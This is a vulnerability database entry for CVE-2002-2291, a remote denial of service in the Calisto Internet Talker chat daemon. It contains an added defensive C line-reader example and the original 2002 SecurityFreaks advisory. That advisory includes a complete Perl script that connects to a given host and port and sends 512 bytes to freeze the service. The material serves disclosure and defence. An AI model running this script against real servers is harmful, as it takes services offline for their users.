Calisto Internet Talker Remote Denial-of-Service Vulnerability


Vulnerability ID: 1203591    Vulnerability type: Buffer overflow
Published: 2002-11-25    Updated: 2002-12-31
CVE ID: CVE-2002-2291
CNNVD-ID: CNNVD-200212-578
Platform: N/A    CVSS score: 7.8
|Source
https://cxsecurity.com/issue/WLB-2007100062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-578
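|Details
Calisto is a program that lets multiple users connect to a server over telnet and chat. Calisto does not correctly handle requests carrying over-long data, and a remote attacker can exploit this to cause a denial of service. Sending a request of 512 bytes or more to the Calisto daemon can make the system stop running, resulting in a denial of service. A manual restart is required to restore normal service.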
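The entry does not show Calisto's source or say why the daemon freezes, so the following is an added example, not code from Calisto or from the advisory: a bounded line reader for a telnet-style daemon that rejects input at the 512-byte threshold instead of stalling on it. `LINE_CAP`, `struct conn` and `conn_feed` are hypothetical names, and the 512-byte buffer size is an assumption taken from the threshold stated above.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LINE_CAP 512  /* assumed buffer size, matching the 512-byte threshold */

enum feed_result { FEED_NEED_MORE, FEED_LINE_READY, FEED_OVERLONG };

struct conn {              /* hypothetical per-client state */
    char   buf[LINE_CAP];  /* pending input; NUL-terminated once a line completes */
    size_t used;           /* bytes currently held in buf */
};

/* Append bytes read from the socket. On FEED_LINE_READY, c->buf holds one
 * NUL-terminated line and *consumed tells the caller where the next line starts.
 * On FEED_OVERLONG the pending data is discarded so the caller can close this
 * client; the function never writes past buf and never loops on a full buffer. */
enum feed_result conn_feed(struct conn *c, const char *data, size_t len, size_t *consumed)
{
    for (size_t i = 0; i < len; i++) {
        char ch = data[i];
        if (ch == '\n') {
            if (c->used > 0 && c->buf[c->used - 1] == '\r')
                c->used--;                 /* telnet clients send CRLF */
            c->buf[c->used] = '\0';
            c->used = 0;
            *consumed = i + 1;
            return FEED_LINE_READY;
        }
        if (c->used == LINE_CAP - 1) {     /* no room for ch plus the NUL */
            c->used = 0;
            *consumed = len;
            return FEED_OVERLONG;
        }
        c->buf[c->used++] = ch;
    }
    *consumed = len;
    return FEED_NEED_MORE;
}

int main(void)
{
    struct conn c = { .used = 0 };
    char flood[LINE_CAP];                  /* constructed input: 512 bytes, no newline */
    size_t n;
    memset(flood, 'A', sizeof flood);
    if (conn_feed(&c, flood, sizeof flood, &n) == FEED_OVERLONG)
        puts("over-long input: close this client, keep serving the rest");
    if (conn_feed(&c, "hello\r\n", 7, &n) == FEED_LINE_READY)
        printf("line: %s\n", c.buf);
    return 0;
}
```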
|Exploit


[=================================================================]
  [...............:[  S e c u r i t y F r e a k s  ]:...............]
  [.................:[  www.securityfreaks.com  ]:..................]
  [=================================================================]

Title         : Calisto Internet Talker Remote DOS
Risk          : Moderate
Software      : Calisto Internet Talker Version 0.04 and prior
Platforms     : Linux/Solaris/Cygwin
Vendor URL    : http://www.arcsite.de/hp/flibble/calisto/
Discovered by : subversive <subversive (at) linuxmail (dot) org>
Advisory ID   : SFAD02-002

.....:[ Overview :

Calisto is an Internet Talker that allows many people to use telnet
to connect to the server and chat. Calisto is coded in C and runs on
Linux/Solaris/Cygwin platforms. It is available on sourceforge as 
well as http://www.arcsite.de/hp/flibble/calisto/.

.....:[ Details :

By sending 512 bytes or more to the Calisto daemon it is possible to
freeze it, resulting in a denial of service. Calisto comes with an
autorun shell script that has been written for the sole purpose of 
automatically restarting Calisto should it crash but unfortunately
this vulnerability will not cause Calisto to crash and segfault but
rather freeze until manually restarted.

.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.

.....:[ Solution :

Due to the nature of this bug it poses as more of an annoyance than a
major security threat. If you're concerned with the problem then simply
disable Calisto until an updated version or patch has been released. 
Hopefully Calisto's vendors will take notice of this advisory and do 
something about the problem.

.....:[ Exploit - SF-talkischeap.pl :

#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*

use IO::Socket;

$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   S e c u r i t y F r e a k s
     www.securityfreaks.com

SF-talkischeap.pl by subversive
   Calisto Internet Talker Version 0.04 Remote Denial of Service

Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;

|References

Source: BID
Name: 6238
Link: http://www.securityfocus.com/bid/6238
Source: XF
Name: calisto-dos(10694)
Link: http://xforce.iss.net/xforce/xfdb/10694
Source: SREASON
Name: 3241
Link: http://securityreason.com/securityalert/3241
Source: BUGTRAQ
Name: 20021125 SFAD02-002: Calisto Internet Talker Remote DOS
Link: http://online.securityfocus.com/archive/1/300986
Source: VULNWATCH
Name: 20021125 SFAD02-002: Calisto Internet Talker Remote DOS
Link: http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0090.html
Source: NSFOCUS
Name: 3905
Link: http://www.nsfocus.net/vulndb/3905
